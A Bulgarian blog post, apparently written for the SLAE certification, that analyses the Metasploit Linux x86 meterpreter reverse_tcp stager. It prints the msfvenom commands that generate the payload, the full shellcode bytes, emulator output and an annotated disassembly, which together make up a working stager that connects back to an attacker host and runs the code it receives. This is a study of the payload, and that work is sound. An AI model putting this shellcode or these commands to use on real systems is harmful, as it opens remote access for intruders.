В тази публикация ще анализираме linux/meterpreter/reverse_tcp с libemu.
Опции на полезния товар
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp --payload-options Options for payload/linux/x86/meterpreter/reverse_tcp: Name: Linux Mettle x86, Reverse TCP Stager Module: payload/linux/x86/meterpreter/reverse_tcp Platform: Linux, Linux Arch: x86 Needs Admin: No Total size: 245 Rank: Normal Provided by: William Webb <[email protected]> skape <[email protected]> egypt <[email protected]> tkmru Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Description: Inject the mettle server payload (staged). Connect back to the attacker
Генериране на C shellcode
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f c No platform was selected, choosing Msf::Module::Platform::Linux from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 123 bytes Final size of c file: 543 bytes unsigned char buf[] = "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89" "\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c" "\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0" "\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05" "\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9" "\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd" "\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80" "\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00" "\x00\xcd\x80";
Анализ на shellcode с libemu
root@kali:/usr/bin# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f raw | ./sctest -vvv -Ss 10000 verbose = 3 No platform was selected, choosing Msf::Module::Platform::Linux from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 123 bytes <code snippet> int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int connect ( int sockfd = 14; struct sockaddr_in * serv_addr = 0x00416fbe => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 16845578 (host=10.11.1.1); }; char sin_zero = " "; }; int addrlen = 102; ) = 0;
Горният код основно създава сокет и се свързва към 10.11.1.1 на порт 4444. Това е точно като нашите първи две задачи. Обърнете внимание, че изходът на sctest спира след connect(); останалите системни извиквания (mprotect, read, exit) се виждат едва в дизасемблирания код по-долу.
Ndisasm преобразува C shellcode-а в асемблерен код.
root@kali:~# echo -ne "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80" | ndisasm -u - 00000000 6A0A push byte +0xa 00000002 5E pop esi ;push 0xa into esi 00000003 31DB xor ebx,ebx ;zero out ebx 00000005 F7E3 mul ebx ;ebx*eax = eax = 0 00000007 53 push ebx ;Push 0 into stack 00000008 43 inc ebx ;ebx = 1 00000009 53 push ebx ;Push 1 into stack 0000000A 6A02 push byte +0x2 ;Push 2 into stack 0000000C B066 mov al,0x66 ;socketcall into eax 0000000E 89E1 mov ecx,esp ;ecx point to 2,1,0 on stack 00000010 CD80 int 0x80 ;call sys_socket 00000012 97 xchg eax,edi 00000013 5B pop ebx ; ebx=2 00000014 680A0B0101 push dword 0x1010b0a ;IP 00000019 680200115C push dword 0x5c110002 ;PORT 0000001E 89E1 mov ecx,esp ;ecx point to IP,PORT on stack 00000020 6A66 push byte +0x66 00000022 58 pop eax ;socketcall into eax 00000023 50 push eax ;push socketcall 00000024 51 push ecx ;push sockaddr 00000025 57 push edi ;socketfd 00000026 89E1 mov ecx,esp ;ecx point to socketcall, addr, socketfd 00000028 43 inc ebx ;ebx=3 00000029 CD80 int 0x80 ;exec sys_connect 0000002B 85C0 test eax,eax 0000002D 7919 jns 0x48 ;jump to mprotect if SF=0 0000002F 4E dec esi 00000030 743D jz 0x6f ;jump to sys_exit if ZF=0 00000032 68A2000000 push dword 0xa2 00000037 58 pop eax ;eax= 0xa2 (sys_nanosleep) 00000038 6A00 push byte +0x0 0000003A 6A05 push byte +0x5 0000003C 89E3 mov ebx,esp 0000003E 31C9 xor ecx,ecx 00000040 CD80 int 0x80 ;syscall nanosleep 00000042 85C0 test eax,eax 00000044 79BD jns 0x3 ;jump if SF=0 00000046 EB27 jmp short 0x6f ;jump to sys_exit 00000048 B207 
mov dl,0x7 0000004A B900100000 mov ecx,0x1000 0000004F 89E3 mov ebx,esp 00000051 C1EB0C shr ebx,byte 0xc 00000054 C1E30C shl ebx,byte 0xc 00000057 B07D mov al,0x7d ;eax=sys_mprotect 00000059 CD80 int 0x80 ;exec sys_mprotect 0000005B 85C0 test eax,eax 0000005D 7810 js 0x6f ;jump to sys_exit if SF=1 0000005F 5B pop ebx 00000060 89E1 mov ecx,esp 00000062 99 cdq 00000063 B60C mov dh,0xc ;edx=0xc 00000065 B003 mov al,0x3 ;eax=0x3(sys_read) 00000067 CD80 int 0x80 ;exec sys_read 00000069 85C0 test eax,eax 0000006B 7802 js 0x6f ;jump to sys_exit if SF=1 0000006D FFE1 jmp ecx 0000006F B801000000 mov eax,0x1 ;eax=0x1(sys_exit) 00000074 BB01000000 mov ebx,0x1 ;ebx=0x1 00000079 CD80 int 0x80 ;exec sys_exit root@kali:~#
Този шелкод започва със създаване на сокет и обратно свързване към атакуващата машина. След това следва код за обработка на грешки: esi е инициализиран с 0xa и се намалява при всеки неуспешен connect; между опитите sys_nanosleep изчаква 5 секунди и свързването се повтаря, а когато броячът стигне нула, се извиква sys_exit. Ако не възникне грешка, инструкцията jns 0x48
ще прескочи към mov dl,0x7
. Тази част от инструкциите ще настрои и изпълни sys_mprotect
. Следващата част от инструкциите чете 0xC00
байта от машината на нападателя. В крайна сметка sys_exit
syscall се използва за коректно приключване на програмата.
Тази публикация в блога е създадена за изпълнение на изискванията на сертифицирането SecurityTube Linux Assembly Expert:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Студентски ID: SLAE-1414